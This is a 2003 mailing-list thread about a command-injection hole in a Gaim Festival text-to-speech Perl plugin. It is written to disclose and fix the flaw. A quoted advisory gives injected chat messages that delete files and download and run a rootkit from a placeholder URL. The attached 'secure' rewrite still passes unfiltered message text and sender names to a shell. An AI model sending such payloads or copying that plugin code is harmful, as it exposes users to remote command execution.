DUH... would help if I attached my attachment.

I am right proud of myself for this, and it also needs mention to address the security issue that our friend Error (is that a reference to Zelda 2?) raised.

Attached, find the latest reissue of the Gaim festival plugin. The guy that wrote it, wrote it for pre-0.68 Perl API, but it was secure against the sort of attack that Error described. I have since taken it and recoded it to work with post-0.68 versions of Gaim. It is attached.

By all means, if you see an exploitable bug in there, let me know! I'm just a perl-tot..

Cheers,
~Brian

On Wed, 2003-10-15 at 11:29, error wrote:
> It has come to my attention that people have actually used this example
> code for a gaim plugin:
>
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
>
> sub goodbye {
>     AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
>
> sub synthesize {
>     my $string = $_[0];
>     $string =~ s/\<.*?\>//g;
>     $string =~ s/\".*\"//;
>     system("echo \"$string\" | /usr/bin/festival --tts");
> }
>
> As taken from:
> http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
>
> This has to be one of the most amusing ways to gain a local user's
> privileges I have ever seen by an "Expert (TM)"
>
> Exploit code?
> You have a shell through gaim with that.
>
> Just pass it this message (or really any message for that matter):
>
> Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
>
> Or perhaps:
>
> Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
> rootkit;./rootkit
>
> Perhaps someone should ask:
>
> "(Is s/[^\w]//g really that hard to do?!)"
>
> So a fixed version would look like this:
>
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
>
> sub goodbye {
>     AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
>
> sub synthesize {
>     my $string = $_[0];
>     $string =~ s/\<.*?\>//g;
>     $string =~ s/\".*\"//;
>     $string =~ s/[^\w]//g;
>     system("echo \"$string\" | /usr/bin/festival --tts");
> }
>
> Just a minor comment, nothing special.

--
HCTITS Security Division <security@humancentrictech.com>
HumanCentric Technologies

# gabfest.pl
# updated by Brian Henning <brian@cheetah.dynip.com>
# License: GPL
#
# Based upon:
#GAIMFestival.pl
#By: Matt Davis <agent@sdf.lonestar.org>
#Screen Name: dasmittel
#License: GPL
#
#This is a perl plugin written for GAIM version 0.11
#It will make festival read your incoming messages to you
#after stripping out any html tags that the windows clients send
#
#The fork allows the message to be displayed as it is being said. If
#system was used, the message would not display until after festival was
#done saying it.
#
#03/17/01

use Gaim;

%PLUGIN_INFO = (
    perl_api_version => 2,
    name             => "GabFest",
    version          => "0.5",
    summary          => "Uses Festival to read incoming instant messages",
    description      => "There's nothing more to say about this plugin.",
    author           => "Matt Davis, recoded by Brian Henning",
    url              => "",
    load             => "plugin_load",
    unload           => "plugin_unload"
);

sub plugin_init {
    return %PLUGIN_INFO;
}

sub plugin_load {
    $plugin = shift;
    Gaim::signal_connect(Gaim::Conversations::handle, "received-im-msg", $plugin, \&festival_say, 0);
#   Gaim::signal_connect($plugin, Gaim::Conversation, "received-im-msg", \&festival_say);
    unless(fork){exec("echo Gabfest has loaded | artsdsp festival -b --tts");}
    Gaim::print("Meaningless Drivel", "The damn thing is loaded, not that it does any good.");
}

sub plugin_unload {
    $plugin = shift;
    Gaim::print("GabFest", "GabFest has unloaded.");
}

sub festival_say {
    my ($gc, $sendername, $message, $flags) = @_;
    $_ = $message;
    s/<(?:[^>\'\"]*|([\'\"]).*?\1)*>//gs; #Parse out most HTML. See note 1.
    s/\'//g; #These lines remove characters that cannot be sent to festival
    s/\"//g; # via the command line
    s/\(//g;
    s/\)//g;
    s/\>//g;
    s/\<//g;
    s/\;//g;
    $message = $_;
    if ($message ne ""){
        unless (fork){
            exec("echo $sendername said, $message | artsdsp festival -b --tts");}
    } else {
        system("echo The function was called, but there was apparently nothing to say | artsdsp festival -b --tts");
    }
    return 0;
}

#--- Note 1.
#This section was taken from the URL below
#http://www.rocketaware.com/perl/perlfaq9/How_do_I_remove_HTML_from_a_stri.htm
#---
#Thanks guys.
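
Added example, not part of the original messages or of gabfest.pl: both plugins in this thread build an "echo ... | festival" string for a shell and then try to filter the message so the shell cannot misread it. The sketch below writes the text to the speech program's stdin through a list-form pipe open instead, so no shell parses it at all. speak() and the stand-in child command are hypothetical names chosen for the illustration, and the sample sender and message are constructed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper (not Gaim API): send $text to a TTS program's stdin.
# @tts_cmd is the program and its arguments as a list. With list-form
# open('|-') Perl execs the program directly, so no shell sees the message.
sub speak {
    my ($text, @tts_cmd) = @_;

    $text =~ s/<[^>]*>//g;              # drop HTML tags; cosmetic, not a security control
    $text =~ s/[\x00-\x1f\x7f]+/ /g;    # control characters and newlines become spaces
    return 0 unless $text =~ /\S/;      # nothing left to say

    local $SIG{PIPE} = 'IGNORE';        # a child that exits early must not kill the caller
    my $pid = open(my $tts, '|-', @tts_cmd);
    unless ($pid) {
        warn "cannot start $tts_cmd[0]: $!\n";
        return 0;
    }
    print {$tts} $text, "\n";
    return close($tts) ? 1 : 0;         # close() waits for the child and checks its exit status
}

# Constructed sample input: quotes, semicolons and a harmless marker command
# in both the sender name and the message body.
my $sender  = 'buddy"; echo INJECTED-FROM-NAME; "';
my $message = '<b>Hi</b> there"; echo INJECTED-FROM-MESSAGE; echo "';

# Stand-in for festival so the demo runs anywhere: this perl, echoing stdin.
# On a machine with festival, pass ('/usr/bin/festival', '--tts') instead.
my @stand_in = ($^X, '-ne', 'print "child read: $_"');

speak("$sender said, $message", @stand_in)
    or warn "TTS command failed\n";
```

The child prints the quotes, semicolons and marker text back as ordinary data, and neither marker command runs. speak() blocks until the child exits; gabfest.pl forks before starting festival so the message displays while it is spoken, and the same fork can wrap this call.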